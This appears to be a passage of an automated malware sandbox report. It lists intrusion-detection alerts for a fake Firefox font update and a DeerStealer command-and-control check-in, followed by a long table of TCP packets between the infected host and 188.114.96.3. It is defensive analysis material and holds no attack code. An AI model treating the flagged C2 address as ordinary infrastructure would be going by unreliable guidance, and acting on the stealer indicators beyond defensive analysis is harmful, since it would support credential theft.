2024-11-14T19:57:59.410320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58017	188.114.96.3	443	TCP
2024-11-14T19:58:01.125630+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58018	188.114.96.3	443	TCP
2024-11-14T19:58:02.706963+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58019	188.114.96.3	443	TCP
2024-11-14T19:58:28.466185+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58020	188.114.96.3	443	TCP
2024-11-14T19:58:29.346638+0100	2056550	ET MALWARE Win32/DeerStealer CnC Checkin	1	192.168.2.8	58020	188.114.96.3	443	TCP
2024-11-14T19:58:30.627206+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58021	188.114.96.3	443	TCP
2024-11-14T19:58:31.965751+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58022	188.114.96.3	443	TCP
2024-11-14T19:58:34.454171+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58023	188.114.96.3	443	TCP
2024-11-14T19:58:36.337590+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58024	188.114.96.3	443	TCP
2024-11-14T19:58:37.607860+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58025	188.114.96.3	443	TCP
2024-11-14T19:58:38.797928+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58026	188.114.96.3	443	TCP
2024-11-14T19:58:39.870099+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58027	188.114.96.3	443	TCP
2024-11-14T19:58:41.516373+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58028	188.114.96.3	443	TCP
2024-11-14T19:58:43.224849+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	58029	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 14, 2024 19:57:44.996813059 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:44.996884108 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:44.997008085 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:44.998140097 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:44.998157024 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:45.902179956 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:45.902270079 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:45.904021025 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:45.904033899 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:45.904458046 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:45.948009968 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:45.948039055 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:45.948203087 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.776905060 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.776966095 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777004004 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777014971 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.777036905 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777074099 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.777076960 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777091980 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777131081 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.777142048 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777173042 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.777220964 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.777228117 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.782576084 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.782634974 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.782644987 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.834609985 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.896155119 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.944078922 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:46.944103956 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:46.990976095 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.034034014 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.034729004 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.034797907 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.034825087 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.036371946 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.036428928 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.036437988 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.039585114 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.039635897 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.039644003 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.042789936 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.042834044 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.042844057 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.042854071 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.042943001 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.045980930 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.100254059 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.154397964 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.154633999 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.154752016 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.154795885 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.155127048 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.155183077 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.155191898 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.158483028 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.158539057 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.158546925 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.161672115 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.161726952 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.161734104 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.161850929 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.161909103 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.161916018 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.209388018 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.209455967 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.209475994 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.256567955 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.272218943 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.296879053 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.296927929 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.296958923 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.298582077 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.298626900 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.298635960 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.301647902 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.301696062 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.301702976 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.301759958 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.301805973 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.301918983 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.301919937 CET	58009	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.301985025 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.302000999 CET	443	58009	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.351502895 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.351545095 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:47.351622105 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.351946115 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:47.351958990 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.217262030 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.217329979 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.218549013 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.218564034 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.218885899 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.219702005 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.219702005 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.219784975 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.621912003 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.622154951 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.622265100 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.641319036 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.641319036 CET	58010	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.641349077 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.641360044 CET	443	58010	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.794985056 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.795022011 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:48.795500040 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.796145916 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:48.796160936 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.423564911 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.423651934 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.425024986 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.425036907 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.425844908 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.427069902 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.427086115 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.427092075 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.825414896 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.825495958 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.825917006 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.916954041 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.916999102 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:49.917015076 CET	58011	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:49.917025089 CET	443	58011	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:52.506479025 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:52.506516933 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:52.506743908 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:52.521758080 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:52.521785021 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.226697922 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.226778030 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.228336096 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.228346109 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.228594065 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.229531050 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.230432987 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.230469942 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.230566025 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.230602980 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.230703115 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.230752945 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.230866909 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.230895996 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.231025934 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.231055975 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.231188059 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.231216908 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.231225014 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.231360912 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.231395006 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.240890026 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241074085 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241123915 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241137028 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241141081 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241174936 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241309881 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241359949 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241384983 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241404057 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241482019 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241672993 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241719007 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241741896 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241785049 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:53.241784096 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:53.241831064 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.397057056 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.397218943 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.397850990 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.397886038 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.397902966 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.397902966 CET	58013	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.397911072 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.397917986 CET	443	58013	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.411108971 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.411158085 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:54.411362886 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.412837982 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:54.412858009 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.114095926 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.114166975 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.115771055 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.115777016 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.115998983 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.116945028 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.119069099 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.119072914 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.609002113 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.609071970 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.609112978 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.611905098 CET	58014	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.611921072 CET	443	58014	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.633414984 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.633450985 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:55.633518934 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.634010077 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:55.634025097 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:56.355787992 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:56.355854988 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:56.359785080 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:56.359792948 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:56.360079050 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:56.361649036 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:56.361670017 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:56.361675024 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.069592953 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.069643974 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.069782972 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.069967031 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.069984913 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.070014000 CET	58015	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.070020914 CET	443	58015	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.216568947 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.216639042 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.220277071 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.220760107 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.220788956 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.905349970 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.906771898 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.906771898 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.906800985 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.907027006 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:57.908348083 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.908577919 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:57.908581972 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.416884899 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.416949034 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.417017937 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.418121099 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.418169975 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.418199062 CET	58016	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.418215036 CET	443	58016	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.504964113 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.505000114 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:58.505103111 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.505455017 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:58.505470991 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:59.410190105 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:59.410320044 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:59.411685944 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:59.411695957 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:59.412631035 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:57:59.413542986 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:59.413568974 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:57:59.413712025 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:00.194108963 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:00.194175005 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:00.194251060 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:00.194468975 CET	58017	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:00.194484949 CET	443	58017	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:00.437500000 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:00.437549114 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:00.437612057 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:00.438129902 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:00.438144922 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.125370979 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.125629902 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.127214909 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.127245903 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.127552032 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.128457069 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.128670931 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.128725052 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.128866911 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.128909111 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.129086971 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.129134893 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.129254103 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.129278898 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.784440041 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.784504890 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.784707069 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.784890890 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.784934998 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.784967899 CET	58018	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.784985065 CET	443	58018	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.838864088 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.838920116 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:01.839016914 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.839320898 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:01.839334011 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:02.706768036 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:02.706963062 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:02.708698034 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:02.708714962 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:02.708961010 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:02.710263968 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:02.751359940 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:02.755378008 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:02.755400896 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:03.268978119 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:03.269051075 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:03.269162893 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:03.291387081 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:03.291410923 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:03.291450977 CET	58019	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:03.291456938 CET	443	58019	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:27.599447012 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:27.599502087 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:27.599597931 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:27.600749969 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:27.600766897 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:28.466108084 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:28.466185093 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:28.467530012 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:28.467550039 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:28.467806101 CET	443	58020	188.114.96.3	192.168.2.8
Nov 14, 2024 19:58:28.522289991 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:28.522665024 CET	58020	443	192.168.2.8	188.114.96.3
Nov 14, 2024 19:58:28.522716999 CET	58020	443	192.168.2.8	188.114.96.3
